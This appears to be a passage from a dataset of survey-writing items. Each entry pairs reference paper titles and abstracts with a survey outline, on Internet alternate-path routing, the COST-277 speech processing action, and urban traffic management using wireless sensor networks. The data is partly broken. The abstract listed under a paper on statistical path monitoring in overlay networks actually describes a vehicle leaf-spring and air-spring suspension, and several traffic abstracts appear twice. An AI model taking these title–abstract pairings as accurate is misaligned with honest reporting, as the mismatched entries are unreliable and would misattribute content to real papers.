the Akamai servers. Finally, we illustrate how large-scale overlay networks can exploit Akamai redirections to identify the best detouring nodes for one-hop source routing. Our research shows that in more than 50% of investigated scenarios, it is better to route through the nodes "recommended" by Akamai, than to use the direct paths. Because this is not the case for the rest of the scenarios, we develop lowoverhead pruning algorithms that avoid Akamai-driven paths when they are not beneficial. --- paper_title: Characterizing selfishly constructed overlay routing networks paper_content: We analyze the characteristics of overlay routing networks generated by selfish nodes playing competitive network construction games. We explore several networking scenarios - some simplistic, others more realistic - and analyze the resulting Nash equilibrium graphs with respect to topology, performance, and resilience. We find a fundamental tradeoff between performance and resilience, and show that limiting the degree of nodes is of great importance in controlling this balance. Further, by varying the cost function, the game produces widely different topologies; one parameter in particular - the relative cost between maintaining an overlay link and increasing the path length to other nodes - can generate topologies with node-degree distributions whose tails vary from exponential to power-law. We conclude that competitive games can create overlay routing networks satisfying very diverse goals. --- paper_title: Practical Issues of Statistical Path Monitoring in Overlay Networks with Large, Rank-Deficient Routing Matrices paper_content: A conventional form of vehicle axle suspension comprises on each side of a vehicle-a leaf spring pack and a shock absorber system. A height control system may also be included. According to this invention the leaf spring pack is replaced by a single leaf spring and a pair of air springs. The opposite ends of the single leaf spring are shackled to the existing shackle attachments and their vehicle frame mounts. Midway between its ends the single leaf spring is connected to the adjacent axle end by the existing spring-to-axle attachment components. In order to compensate for the difference in thicknesses of leaf spring pack and the single leaf spring at their midpoints, a spacer having a vertical thickness equal to the difference in the thicknesses is mounted on top of the single thickness spring at the axle. Air spring support brackets are symmetrically mounted on the chassis frame member on opposite sides of the axle. The upper end of each air spring is attached to one of the brackets and the lower end of each air spring is attached to the single leaf spring. Preferably a-height control system is provided on each side so as to maintain the chassis at a predetermined level. Except for the single leaf spring and the spacer, the other components may be of the type used in conventional leaf spring pack suspensions. --- paper_title: Exploiting routing redundancy via structured peer-to-peer overlays paper_content: Structured peer-to-peer overlays provide a natural infrastructure for resilient routing via efficient fault detection and precomputation of backup paths. These overlays can respond to faults in a few hundred milliseconds by rapidly shifting between alternate routes. In this paper, we present two adaptive mechanisms for structured overlays and illustrate their operation in the context of Tapestry, a fault-resilient overlay from Berkeley. We also describe a transparent, protocol-independent traffic redirection mechanism that tunnels legacy application traffic through overlays. Our measurements of a Tapestry prototype show it to be a highly responsive routing service, effective at circumventing a range of failures while incurring reasonable cost in maintenance bandwidth and additional routing latency. --- paper_title: Race Conditions in Coexisting Overlay Networks paper_content: By allowing end hosts to make independent routing decisions at the application level, different overlay networks may unintentionally interfere with each other. This paper describes how multiple similar or dissimilar overlay networks could experience race conditions, resulting in oscillations (in both route selection and network load) and cascading reactions. We pinpoint the causes for synchronization and derive an analytic formulation for the synchronization probability of two overlays. Our model indicates that the probability of synchronization is non-negligible across a wide range of parameter settings, thus implying that the ill effects of synchronization should not be ignored. Using the analytical model, we find an upper bound on the duration of traffic oscillations. We also show that the model can be easily extended to include a large number of co-existing overlays. We validate our model through simulations that are designed to capture the transient routing behavior of both the IP- and overlay-layers. We use our model to study the effects of factors such as path diversity (measured in round trip times) and probing aggressiveness on these race conditions. Finally, we discuss the implications of our study on the design of path probing process in overlay networks and examine strategies to reduce the impact of race conditions. --- paper_title: Interdomain traffic engineering in a locator/identifier separation context paper_content: The Routing Research Group (RRG) of the Internet Research Task Force (IRTF) is currently discussing several architectural solutions to build an interdomain routing architecture that scales better than the existing one. The solutions family currently being discussed concerns the addresses separation into locators and identifiers, LISP being one of them. Such a separation provides opportunities in terms of traffic engineering. In this paper, we propose an open and flexible solution that allows an ISP using identifier/locator separation to engineer its interdomain traffic. Our solution relies on the utilization of a service that transparently ranks paths using cost functions. We implement a prototype server and demonstrate its benefits in a LISP testbed. --- paper_title: On characterizing BGP routing table growth paper_content: The sizes of the BGP routing tables have increased by an order of magnitude over the last six years. This dramatic growth of the routing table can decrease the packet forwarding speed and demand more router memory space. In this paper, we explore the extent that various factors contribute to the routing table size and characterize the growth of each contribution. We begin with measurement study using routing tables of Oregon Route Views server to determine the contributions of multi-homing, load balancing, address fragmentation, and failure to aggregate to routing table size. We find that the contribution of address fragmentation is the greatest and is three times that of multi-homing or load balancing. The contribution of failure to aggregate is the least. Although multi-homing and load balancing contribute less to routing table size than address fragmentation does, we observe that the contribution of multi-homing and that of load balancing grow faster than the routing table does and that the load balancing has surpassed multihoming becoming the fastest growing contributor. Moreover, we find that both load balancing and multi-homing contribute to routing table growth by introducing more prefixes of length greater than 17 but less than 25, which is the fastest growing class of prefixes. Next, we compare the growth of the routing table to the expanding of IP addresses that can be routed and conclude that the growth of routable IP addresses is much slower than that of routing table size. Last, we demonstrate that our findings based on the view derived from the Oregon server are accurate through evaluation using additional 15 routing tables collected from different locations in the Internet. --- paper_title: Delayed Internet routing convergence paper_content: This paper examines the latency in Internet path failure, failover, and repair due to the convergence properties of interdomain routing. Unlike circuit-switched paths which exhibit failover on the order of milliseconds, our experimental measurements show that interdomain routers in the packet-switched Internet may take tens of minutes to reach a consistent view of the network topology after a fault. These delays stem from temporary routing table fluctuations formed during the operation of the border gateway protocol (BGP) path selection process on the Internet backbone routers. During these periods of delayed convergence, we show that end-to-end Internet paths will experience intermittent loss of connectivity, as well as increased packet loss and latency. We present a two-year study of Internet routing convergence through the experimental instrumentation of key portions of the Internet infrastructure, including both passive data collection and fault-injection machines at major Internet exchange points. Based on data from the injection and measurement of several hundred thousand interdomain routing faults, we describe several unexpected properties of convergence and show that the measured upper bound on Internet interdomain routing convergence delay is an order of magnitude slower than previously thought. Our analysis also shows that the upper theoretic computational bound on the number of router states and control messages exchanged during the process of BGP convergence is factorial with respect to the number of autonomous systems in the Internet. Finally, we demonstrate that much of the observed convergence delay stems from specific router vendor implementation decisions and ambiguity in the BGP specification. --- paper_title: MIRO: multi-path interdomain routing paper_content: The Internet consists of thousands of independent domains with different, and sometimes competing, business interests. However, the current interdomain routing protocol (BGP) limits each router to using a single route for each destination prefix, which may not satisfy the diverse requirements of end users. Recent proposals for source routing offer an alternative where end hosts or edge routers select the end-to-end paths. However, source routing leaves transit domains with very little control and introduces difficult scalability and security challenges. In this paper, we present a multi-path inter-domain routing protocol called MIRO that offers substantial flexiility, while giving transit domains control over the flow of traffic through their infrastructure and avoiding state explosion in disseminating reachability information. In MIRO, routers learn default routes through the existing BGP protocol, and arbitrary pairs of domains can negotiate the use of additional paths (bound to tunnels in the data plane) tailored to their special needs. MIRO retains the simplicity of BGP for most traffic, and remains backwards compatible with BGP to allow for incremental deployability. Experiments with Internet topology and routing data illustrate that MIRO offers tremendous flexibility for path selection with reasonable overhead. ---
Title: Finding Alternate Paths in the Internet: A Survey of Techniques for End-to-End Path Discovery Section 1: INTRODUCTION Description 1: Introduce the problem of suboptimal routing in the Internet, the importance of alternate paths, and outline various scenarios where alternate paths can improve end-to-end QoS. Section 2: CRITERIA FOR SELECTING ALTERNATE PATHS Description 2: Discuss the performance metrics and criteria for selecting alternate paths, such as latency, throughput, packet loss, and path disjointness. Section 3: Monitoring Paths Based on Performance Description 3: Explain the methodologies for dynamic path monitoring and ranking alternate paths based on performance metrics. Section 4: Disjoint Paths Description 4: Describe the strategies for selecting the most disjoint paths to avoid shared points of failure and ensure reliable data delivery. Section 5: Multi-path routing Description 5: Explore the concept of multi-path routing and its application in improving data transmission reliability through techniques such as Forward Error Correction (FEC). Section 6: USES OF ALTERNATE PATHS Description 6: Classify the methods of realizing alternate paths, including detour routing, routing deflections, and back-up route construction. Section 7: Detour Routing Description 7: Detail the use of intermediate nodes to create detours around faulty primary paths, highlighting frameworks like Resilient Overlay Networks (RONs). Section 8: Routing Deflections Description 8: Discuss how routers can make localized deflection decisions to find alternate paths around failed links. Section 9: Back-up Routes Description 9: Describe the techniques for constructing backup routes with specific QoS parameters and the process of Fast ReRoute (FRR) setup both inter-domain and intra-domain. Section 10: OPEN RESEARCH ISSUES Description 10: Identify and discuss ongoing research challenges in multi-homing, modifying underlay routing mechanisms, and using alternate paths in Resilient Overlay Networks. Section 11: CONCLUSIONS AND PROPOSALS FOR FUTURE DIRECTIONS OF RESEARCH Description 11: Summarize the survey findings, the effectiveness of current approaches, and propose areas for future research, especially emphasizing deployment of Resilient Overlay Networks and security concerns in underlay routing modifications.
The COST-277 European Action : An overview
8
--- paper_title: The COST-277 Speech Database paper_content: Databases are fundamental for research investigations. This paper presents the speech database generated in the framework of COST-277 “Non-linear speech processing” European project, as a result of European collaboration. This database lets to address two main problems: the relevance of bandwidth extension, and the usefulness of a watermarking with perceptual shaping at different Watermark to Signal ratios. It will be public available after the end of the COST-277 action, in January 2006. ---
Title: The COST-277 European Action: An Overview Section 1: Introduction Description 1: Introduce the COST-277 action and provide a general context and motivation for its establishment. Section 2: Rationale for a Speech Processing COST Action Description 2: Explain the rationale for a global approach in speech processing, highlighting the shortcomings of focusing on isolated areas. Section 3: Management Committee Meetings Description 3: Outline the management and coordination activities, including the administrative and scientific discussions held during various meetings. Section 4: Results and Future Lines Description 4: Summarize the significant outcomes of COST-277, including achievements in collaboration and research, and provide an outlook on future directions. Section 5: Collaboration with Other COST Actions Description 5: Detail the interactions and collaborative efforts between COST-277 and other COST actions, focusing on specific joint projects and interests. Section 6: Collaboration Between Different Countries Description 6: Highlight the inter-country collaborations facilitated by COST-277, using a matrix or diagram to illustrate these collaborations. Section 7: Scientific Results Description 7: Provide an enumeration and brief explanation of the scientific achievements and research activities produced under COST-277. Section 8: Future Lines Description 8: Discuss the plans for the future of the COST-277 community post-project completion, including the final event and continuation of research efforts.
A Survey on Urban Traffic Management System Using Wireless Sensor Networks
15
--- paper_title: A User-Customizable Urban Traffic Information Collection Method Based on Wireless Sensor Networks paper_content: Traffic monitoring can efficiently promote urban planning and encourage better use of public transport. Efficient traffic information collection is one important part of traffic monitoring systems. Based on a technique using wireless sensor networks (WSNs), this paper provides a flexible framework for regional traffic information collection in accordance with user request. This framework serves as a basis for future research in designing and implementing traffic monitoring applications. A two-layer network architecture is established for traffic information acquisition in the context of a WSN environment. In addition, a user-customizable data-centric routing scheme is proposed for traffic information delivery, in which multiple routing-related information is considered for decision-making to meet different user requirements. Simulations have shown good performance of the proposed routing scheme compared with other traditional routing schemes on a real-world urban traffic network. --- paper_title: Efficient Data Propagation in Traffic-Monitoring Vehicular Networks paper_content: Road congestion and traffic-related pollution have a large negative social and economic impact on several economies worldwide. We believe that investment in the monitoring, distribution, and processing of traffic information should enable better strategic planning and encourage better use of public transport, both of which would help cut pollution and congestion. This paper investigates the problem of efficiently collecting and disseminating traffic information in an urban setting. We formulate the traffic data acquisition problem and explore solutions in the mobile sensor network domain while considering realistic application requirements. By leveraging existing infrastructure such as traveling vehicles in the city, we propose traffic data dissemination schemes that operate on both the routing and the application layer; our schemes are frugal in the use of the wireless medium, rendering our system interoperable with the proliferation of competing applications. We introduce the following two routing algorithms for vehicular networks that aim at minimizing communication and, at the same time, adhering to a delay threshold set by the application: 1) delay-bounded greedy forwarding and 2) delay-bounded minimum-cost forwarding. We propose a framework that jointly optimizes the two key processes associated with monitoring traffic, i.e., data acquisition and data delivery, and provide a thorough experimental evaluation based on realistic vehicular traces on a real city map. --- paper_title: Reducing Traffic Jams via VANETs paper_content: A transition from free flow to congested traffic on highways often spontaneously originates, despite the fact that the road could satisfy a higher traffic demand. The reasons for such a traffic breakdown are perturbations caused by human drivers in dense traffic. We present a strategy to reduce traffic congestion with the help of vehicle-to-vehicle communication. Periodically emitted beacons are used to analyze traffic flow and to warn other drivers of a possible traffic breakdown. Drivers who receive such a warning are told to keep a larger gap to their predecessor. By doing so, they are less likely to be the source of perturbations, which can cause a traffic breakdown. We analyze the proposed strategy via computer simulations and investigate which fraction of communicating vehicles is necessary until a beneficial influence on traffic flow is observable. We show that penetration rates of 10% and less can have significant influence on traffic flow and travel times. In addition to applying a realistic mobility model, we further increase the degree of realism by the use of empirical traffic data from loop detectors on a German Autobahn. --- paper_title: A model for traffic control in urban environments paper_content: Wireless technologies can help solve traffic congestions in urban environments, where road infrastructures develop slower than the sometimes exponential growth in the number of cars in traffic. We present a model for traffic control and congestion avoidance developed over a vehicular ad-hoc network created between the cars in traffic and the road infrastructure. We propose a solution for monitoring traffic using not only sensors within the road infrastructure, but also the cars themselves acting as data collectors. The traffic control decision, provided by the road infrastructure, is scalable, load-balanced, and based on correction decisions for the route adjustment based on local areas. We present evaluation results that show the capabilities of the proposed congestion avoidance model. --- paper_title: A vehicle-logo location approach based on edge detection and projection paper_content: Vehicle-logo location is an essential part of vehicle-logo recognition system. In this paper, a new method of vehicle-logo location is proposed. Firstly, the approximate region of vehicle-logo is obtained through the position of vehicle-plate. Then, we judge the texture of vehicle-logo background either horizontal or vertical with the edge detection and projection approach. Finally, with the known texture, position of the vehicle-logo can be located correctly by morphological filter and projection information. Experimental results demonstrate the proposed method is effective. --- paper_title: Instrumentation for safe vehicular flow in intelligent traffic control systems using wireless networks paper_content: This paper describes a ZigBee based wireless system to assists traffic flow on arterial urban roads. Real-time simulation in laboratory environment is conducted to determine the traffic throughput to avoid possible congestions or ease existing congestions. Random numbers are generated to mimic approaching traffic, and this information is shared by a ZigBeebased real-time wirelessly network. Wireless nodes are connected to different PLCs representing different traffic lights in a cluster. Once the information is shared the timing and sequencing decisions are taken collectively in a synchronized manner. In this paper, the information is displayed on SCADA connected to each PLC for viewing the characteristics of continuous vehicular flow. It is found that the topology of the network can play an important role in the throughput of data, which may be critical in safety critical operations such as the control of traffic lights. This paper aims to highlight some of the possible effects of dataflow flow and time-delays faced by modern intelligent control of traffic lights. --- paper_title: Real time evaluation of shortest remaining processing time based schedulers for traffic congestion control using wireless sensor networks paper_content: Pre-timed traffic signals are inefficient in optimizing the traffic flow throughout the day, resulting in greater waiting times at the intersections particularly in congested urban areas during peak hours. Traffic actuated signals use real time traffic data obtained from sensors at the intersections to service queues intelligently. We developed a test bed for the real time evaluation of adaptive traffic light control algorithms using the microscopic traffic simulation open source software, SUMO (Simulation of Urban Mobility), and the AVR 32-bit microcontroller. An interface was developed between SUMO and the AVR microcontroller in which we used the simulation data generated by SUMO as an input to the microcontroller which executed the scheduling algorithms and sent commands back to SUMO for changing the states of the traffic signals accordingly. We implemented four scheduling algorithms in SUMO through the AVR microcontroller, the effect of the algorithms on the traffic network was studied using SUMO and execution times of the scheduling algorithms were measured using the AVR microcontroller. Through this interface, scheduling algorithms can be evaluated more effectively and accurately as compared to the case in which the algorithms are fed with data using pseudo random number generators. --- paper_title: A Study on Vehicle Detection and Tracking Using Wireless Sensor Networks paper_content: Wireless Sensor network (WSN) is an emerging technology and has great potential to be employed in critical situations. The development of wireless sensor networks was originally motivated by military applications like battlefield surveillance. However, Wireless Sensor Networks are also used in many areas such as Industrial, Civilian, Health, Habitat Monitoring, Environmental, Military, Home and Office application areas. Detection and tracking of targets (eg. animal, vehicle) as it moves through a sensor network has become an increasingly important application for sensor networks. The key advantage of WSN is that the network can be deployed on the fly and can operate unattended, without the need for any pre-existing infrastructure and with little maintenance. The system will estimate and track the target based on the spatial differences of the target signal strength detected by the sensors at different locations. Magnetic and acoustic sensors and the signals captured by these sensors are of present interest in the study. The system is made up of three components for detecting and tracking the moving objects. The first component consists of inexpensive off-the shelf wireless sensor devices, such as MicaZ motes, capable of measuring acoustic and magnetic signals generated by vehicles. The second component is responsible for the data aggregation. The third component of the system is responsible for data fusion algorithms. This paper inspects the sensors available in the market and its strengths and weakness and also some of the vehicle detection and tracking algorithms and their classification. This work focuses the overview of each algorithm for detection and tracking and compares them based on evaluation parameters. --- paper_title: Wireless Sensor Networks for Oceanographic Monitoring: A Systematic Review paper_content: Monitoring of the marine environment has come to be a field of scientific interest in the last ten years. The instruments used in this work have ranged from small-scale sensor networks to complex observation systems. Among small-scale networks, Wireless Sensor Networks (WSNs) are a highly attractive solution in that they are easy to deploy, operate and dismantle and are relatively inexpensive. The aim of this paper is to identify, appraise, select and synthesize all high quality research evidence relevant to the use of WSNs in oceanographic monitoring. The literature is systematically reviewed to offer an overview of the present state of this field of study and identify the principal resources that have been used to implement networks of this kind. Finally, this article details the challenges and difficulties that have to be overcome if these networks are to be successfully deployed. --- paper_title: A User-Customizable Urban Traffic Information Collection Method Based on Wireless Sensor Networks paper_content: Traffic monitoring can efficiently promote urban planning and encourage better use of public transport. Efficient traffic information collection is one important part of traffic monitoring systems. Based on a technique using wireless sensor networks (WSNs), this paper provides a flexible framework for regional traffic information collection in accordance with user request. This framework serves as a basis for future research in designing and implementing traffic monitoring applications. A two-layer network architecture is established for traffic information acquisition in the context of a WSN environment. In addition, a user-customizable data-centric routing scheme is proposed for traffic information delivery, in which multiple routing-related information is considered for decision-making to meet different user requirements. Simulations have shown good performance of the proposed routing scheme compared with other traditional routing schemes on a real-world urban traffic network. --- paper_title: Robust and efficient data collection schemes for vehicular multimedia sensor Networks paper_content: In vehicular multimedia sensor networks vehicles are equipped with cameras and they continuously capture images from urban streets. Then, vehicles can use roadside wireless access points encountered during travel to deliver recorded image data to remote data collectors, in which the information from several multimedia streams is aggregated and processed to enable new services, such as urban surveillance, or traffic and road monitoring. However, due to constraints on the wireless access network the amount of image data that can be transferred from vehicles is limited, and data redundancy should be avoided. In this paper we address this issue by using submodular optimization techniques to develop an efficient data collection algorithm capable of providing data redundancy elimination under network capacity constraints. We also design an alternative decentralized scheme that operates on longer time scales and relies only on basic aggregate information. We use network simulations with realistic vehicular mobility patterns to verify the performance gains of our proposed schemes compared to a baseline system that ignores data redundancy. Simulation results show that our data collection techniques can ensure a more accurate coverage of the road network while significantly reducing the amount of transferred data. --- paper_title: Feasibility of deploying wireless sensor based road side solutions for Intelligent Transportation Systems paper_content: The effectiveness of Intelligent Transportation Systems depends on the accuracy and timely reliable provisioning of real time data supplied by traffic data collection mechanisms. Data collection through wireless sensor networks is a very effective approach due to their easy installation, low cost, processing capabilities, small size, flexibility, and wireless communication capabilities. WSN are used in ITS for smart parking lots, adaptive traffic light control, accident avoidance and traffic estimation etc. In this paper we propose a WSN based road side communication architecture and system that can be utilized for the intelligent control and management of vehicular traffic at road intersections. In the proposed architecture, the end nodes are carried by vehicles that communicate with road side units, which in turn send the data to the coordinator module at the intersection. We introduce a reliable and robust channel switching technique that reduces the response time, energy consumption and connectivity delay while increasing the reliability of packet delivery. We perform sensitivity analysis of the proposed system architecture by varying various communication parameters to determine optimum system configuration. The results prove the integrity and feasibility of the deployment of our proposed architecture. --- paper_title: Dissemination and Harvesting of Urban Data Using Vehicular Sensing Platforms paper_content: Recent advances in vehicular communications make it possible to realize vehicular sensor networks, i.e., collaborative environments where mobile vehicles that are equipped with sensors of different nature (from toxic detectors to still/video cameras) interwork to implement monitoring applications. In particular, there is an increasing interest in proactive urban monitoring, where vehicles continuously sense events from urban streets, autonomously process sensed data (e.g., recognizing license plates), and, possibly, route messages to vehicles in their vicinity to achieve a common goal (e.g., to allow police agents to track the movements of specified cars). This challenging environment requires novel solutions with respect to those of more-traditional wireless sensor nodes. In fact, unlike conventional sensor nodes, vehicles exhibit constrained mobility, have no strict limits on processing power and storage capabilities, and host sensors that may generate sheer amounts of data, thus making already-known solutions for sensor network data reporting inapplicable. This paper describes MobEyes, which is an effective middleware that was specifically designed for proactive urban monitoring and exploits node mobility to opportunistically diffuse sensed data summaries among neighbor vehicles and to create a low-cost index to query monitoring data. We have thoroughly validated the original MobEyes protocols and demonstrated their effectiveness in terms of indexing completeness, harvesting time, and overhead. In particular, this paper includes (1) analytic models for MobEyes protocol performance and their consistency with simulation-based results, (2) evaluation of performance as a function of vehicle mobility, (3) effects of concurrent exploitation of multiple harvesting agents with single/multihop communications, (4) evaluation of network overhead and overall system stability, and (5) performance validation of MobEyes in a challenging urban tracking application where the police reconstruct the movements of a suspicious driver, e.g., by specifying the license number of a car. --- paper_title: Delay-optimal data forwarding in Vehicular Sensor Networks paper_content: The vehicular sensor network (VSN) is emerging as a new solution for monitoring urban environments such as intelligent transportation systems and air pollution. One of the crucial factors that determine the service quality of urban monitoring applications is the delivery delay of sensing data packets in the VSN. In this paper, we study the problem of routing data packets with minimum delay in the VSN by exploiting 1) vehicle traffic statistics, 2) anycast routing, and 3) knowledge of future trajectories of vehicles such as busses. We first introduce a novel road network graph model that incorporates the three factors into the routing metric. We then characterize the packet delay on each edge as a function of the vehicle density, speed, and the length of the edge. Based on the network model and delay function, we formulate the packet routing problem as a Markov decision process (MDP) and develop an optimal routing policy by solving the MDP. Evaluations using real vehicle traces in a city show that our routing policy significantly improves the delay performance compared with existing routing protocols. Specifically, optimal VSN data forwarding (OVDF) yields, on average, 96% better delivery ratio and 72% less delivery delay than existing algorithms in some areas distant from destinations. --- paper_title: Traffic control system using wireless sensor network paper_content: The Real time locating system (RTLS) determines and tracks the location of assets and people. This paper presents a novel application to estimate the position and velocity of vehicle using wireless sensor network. Two Anchor nodes are used as reader along roadside and total distance between them is known. Whenever a moving vehicle with tag comes in between the common part of the operating range of two anchor nodes, exchange of information is done using Symmetric double sided two way ranging algorithm, which gives us position information. Using position information at several interval of time, velocity can be easily obtained. Position and velocity is obtained and displayed on base station. Kalman filtering is used to estimate the position and velocity from noisy measurements. Performance evaluation is done comparing vehicle position speed true values with experimental and estimated values. --- paper_title: Vehicular Traffic Monitoring Using Bluetooth Scanning Over a Wireless Sensor Network paper_content: The ubiquitous nature of Bluetooth equipped devices has made it opportunistic to scavenge information that can be repurposed for applications other than initially intended. One such opportunity is in vehicular traffic monitoring, whereby sampling of Bluetooth radios serve as proxies for vehicles and consequently for traffic density and flow. This paper discusses a complete data collection system developed at the University of Manitoba that utilizes a variety of wireless networking technologies and devices to collect inferred traffic data at an intersection along a major thoroughfare in an urban setting. Specifically, a wireless sensor network of slave probes was designed and implemented with the objective to collect Bluetooth device information for this purpose. To facilitate easy setup and a long battery life, a solar-powered probe design was investigated. Data from each slave probe is communicated to a master node through XBee communication, where it is stored on a secure digital (SD) memory card before being transmitted to a central server every five minutes over a global system for mobile communications (GSM) cellular network. The server parses the data received and stores it in a database. Consumer and corporate websites may then access this database to display archived data or current data in real-time to various users. --- paper_title: An Intelligent Traffic Flow Control System Based on Radio Frequency Identification and Wireless Sensor Networks paper_content: This study primarily focuses on the use of radio frequency identification (RFID) as a form of traffic flow detection, which transmits collected information related to traffic flow directly to a control system through an RS232 interface. At the same time, the sensor analyzes and judges the information using an extension algorithm designed to achieve the objective of controlling the flow of traffic. In addition, the traffic flow situation is also transmitted to a remote monitoring control system through ZigBee wireless network communication technology. The traffic flow control system developed in this study can perform remote transmission and reduce traffic accidents. And it can also effectively control traffic flow while reducing traffic delay time and maintaining the smooth flow of traffic. --- paper_title: Using DTMon to monitor transient flow traffic paper_content: We evaluate the performance of the DTMon dynamic traffic monitoring system to measure travel times and speeds in transient flow traffic caused by non-recurring congestion. DTMon uses vehicular networks and roadside infrastructure to collect data from passing vehicles. We show DTMon's ability to gather high-quality real-time traffic data such as travel time and speed. These metrics can be used to detect transitions in traffic flow (e.g., caused by congestion) especially where accurate flow rate information is not available. We evaluate the accuracy and latency of DTMon in providing traffic measurements using two different methods of message delivery. We show the advantages of using dynamically-defined measurement points for monitoring transient flow traffic. We compare DTMon with currently in-use probe-based systems (e.g., AVL) and fixed-point sensors and detectors (e.g., ILD). --- paper_title: Monitoring free flow traffic using vehicular networks paper_content: We present DTMon, a dynamic traffic monitiroing system using vehicular networks, and analyze its performance in free flow (i.e., non-congested) traffic. DTMon uses roadside infrastructure to gather and report current traffic conditions to traffic management centers and equipped vehicles. We analyze how traffic characteristics such as speed, flow rate, percentage of communicating vehicles, and distance from the DTMon measurement point to the roadside infrastructure affects the amount and quality of data that can be gathered and delivered. We evaluate five different methods of delivering data from vehicles to the roadside infrastructure, including pure vehicle-to-vehicle communication, store-and-carry, and hybrid methods. Methods that employ some amount of store-and-carry can increase the delivery rate, but also increase the message delay. We show that with just a few pieces of roadside infrastructure, DTMon can gather high-quality travel time and speed data even with a low percentage of communicating vehicles. --- paper_title: Vehicle-to-vehicle and vehicle-to-roadside multi-hop communications for vehicular sensor networks: Simulations and field trial paper_content: Using vehicles as sensors for traffic and environment monitoring is a new paradigm that opens the way to worthwhile applications. Data collected on board are usually delivered through the cellular network, with the consequent overloading risk. This paper focuses on the alternative adoption of short range vehicle-to-vehicle (V2V) and vehicle-to-roadside (V2R) communications, with particular reference to the wireless access in vehicular environment (WAVE)/IEEE802.11p technology. Specifically, we propose and validate, through simulations in a urban scenario, a simple but effective routing algorithm to forward data through V2V and V2R communications. The benefits are quantified in terms of the amount of data that can be transmitted without using cellular resources. Furthermore, we present an urban field trial, deployed to test our proposed multi-hop algorithm, through the adoption of low cost hardware and open source software. --- paper_title: A vehicle-logo location approach based on edge detection and projection paper_content: Vehicle-logo location is an essential part of vehicle-logo recognition system. In this paper, a new method of vehicle-logo location is proposed. Firstly, the approximate region of vehicle-logo is obtained through the position of vehicle-plate. Then, we judge the texture of vehicle-logo background either horizontal or vertical with the edge detection and projection approach. Finally, with the known texture, position of the vehicle-logo can be located correctly by morphological filter and projection information. Experimental results demonstrate the proposed method is effective. --- paper_title: Low Energy and Low Latency in Wireless Sensor Networks paper_content: It is widely known that in wireless sensor networks (WSN), energy efficiency is of utmost importance. As a result, a common protocol design guideline has been to trade off some performance metrics such as throughput and delay for energy. This has also gone well in line with many applications for WSN. However, there are other applications with real-time constraints, such as those involved in surveillance or control loops, for which WSN still need to be energy efficient but also need to provide better performance, particularly latency. This paper presents a WSN cross-layer design approach involving the physical, MAC, and network layers that not only preserves the energy efficiency of current alternatives but also coordinates the transfer of packets from source to destination in such a way that latency and jitter are improved considerably. Our simulations show how LEMR (Latency, Energy, MAC and Routing), the proposed protocol, outperforms the well-known TMAC and S-MAC protocols in both performance metrics. --- paper_title: Using GPS Data to Gain Insight into Public Transport Travel Time Variability paper_content: Transit service reliability is an important determinant of service quality, which has been mainly studied from the perspective of passengers waiting at stops. Day-to-day variability of travel time also deteriorates service reliability, but is not a well-researched area in the literature partly due to the lack of comprehensive data sets on bus travel times. While this problem is now being addressed through the uptake of global positioning system (GPS)-based tracking systems, methodologies to analyze these data sets are limited. This paper addresses this issue by investigating day-to-day variability in public transport travel time using a GPS data set for a bus route in Melbourne, Australia. It explores the nature and shape of travel time distributions for different departure time windows at different times of the day. Factors causing travel time variability of public transport are also explored using a linear regression analysis. The results show that in narrower departure time windows, travel time distributions are best characterized by normal distributions. For wider departure time windows, peak-hour travel times follow normal distributions, while off-peak travel times follow lognormal distributions. The factors contributing to the variability of travel times are found to be land use, route length, number of traffic signals, number of bus stops, and departure delay relative to the scheduled departure time. Travel time variability is higher in the AM peak and lower in the off-peak. The impact of rainfall on travel time variability is only found significant in the AM peak. While the paper presents new methods for analyzing GPS-based data, there is much scope for expanding knowledge through wider applications to new data sets and using a wider range of explanatory variables. --- paper_title: Delay-optimal data forwarding in Vehicular Sensor Networks paper_content: The vehicular sensor network (VSN) is emerging as a new solution for monitoring urban environments such as intelligent transportation systems and air pollution. One of the crucial factors that determine the service quality of urban monitoring applications is the delivery delay of sensing data packets in the VSN. In this paper, we study the problem of routing data packets with minimum delay in the VSN by exploiting 1) vehicle traffic statistics, 2) anycast routing, and 3) knowledge of future trajectories of vehicles such as busses. We first introduce a novel road network graph model that incorporates the three factors into the routing metric. We then characterize the packet delay on each edge as a function of the vehicle density, speed, and the length of the edge. Based on the network model and delay function, we formulate the packet routing problem as a Markov decision process (MDP) and develop an optimal routing policy by solving the MDP. Evaluations using real vehicle traces in a city show that our routing policy significantly improves the delay performance compared with existing routing protocols. Specifically, optimal VSN data forwarding (OVDF) yields, on average, 96% better delivery ratio and 72% less delivery delay than existing algorithms in some areas distant from destinations. --- paper_title: Vehicular Traffic Monitoring Using Bluetooth Scanning Over a Wireless Sensor Network paper_content: The ubiquitous nature of Bluetooth equipped devices has made it opportunistic to scavenge information that can be repurposed for applications other than initially intended. One such opportunity is in vehicular traffic monitoring, whereby sampling of Bluetooth radios serve as proxies for vehicles and consequently for traffic density and flow. This paper discusses a complete data collection system developed at the University of Manitoba that utilizes a variety of wireless networking technologies and devices to collect inferred traffic data at an intersection along a major thoroughfare in an urban setting. Specifically, a wireless sensor network of slave probes was designed and implemented with the objective to collect Bluetooth device information for this purpose. To facilitate easy setup and a long battery life, a solar-powered probe design was investigated. Data from each slave probe is communicated to a master node through XBee communication, where it is stored on a secure digital (SD) memory card before being transmitted to a central server every five minutes over a global system for mobile communications (GSM) cellular network. The server parses the data received and stores it in a database. Consumer and corporate websites may then access this database to display archived data or current data in real-time to various users. --- paper_title: Using DTMon to monitor transient flow traffic paper_content: We evaluate the performance of the DTMon dynamic traffic monitoring system to measure travel times and speeds in transient flow traffic caused by non-recurring congestion. DTMon uses vehicular networks and roadside infrastructure to collect data from passing vehicles. We show DTMon's ability to gather high-quality real-time traffic data such as travel time and speed. These metrics can be used to detect transitions in traffic flow (e.g., caused by congestion) especially where accurate flow rate information is not available. We evaluate the accuracy and latency of DTMon in providing traffic measurements using two different methods of message delivery. We show the advantages of using dynamically-defined measurement points for monitoring transient flow traffic. We compare DTMon with currently in-use probe-based systems (e.g., AVL) and fixed-point sensors and detectors (e.g., ILD). --- paper_title: Low Energy and Low Latency in Wireless Sensor Networks paper_content: It is widely known that in wireless sensor networks (WSN), energy efficiency is of utmost importance. As a result, a common protocol design guideline has been to trade off some performance metrics such as throughput and delay for energy. This has also gone well in line with many applications for WSN. However, there are other applications with real-time constraints, such as those involved in surveillance or control loops, for which WSN still need to be energy efficient but also need to provide better performance, particularly latency. This paper presents a WSN cross-layer design approach involving the physical, MAC, and network layers that not only preserves the energy efficiency of current alternatives but also coordinates the transfer of packets from source to destination in such a way that latency and jitter are improved considerably. Our simulations show how LEMR (Latency, Energy, MAC and Routing), the proposed protocol, outperforms the well-known TMAC and S-MAC protocols in both performance metrics. 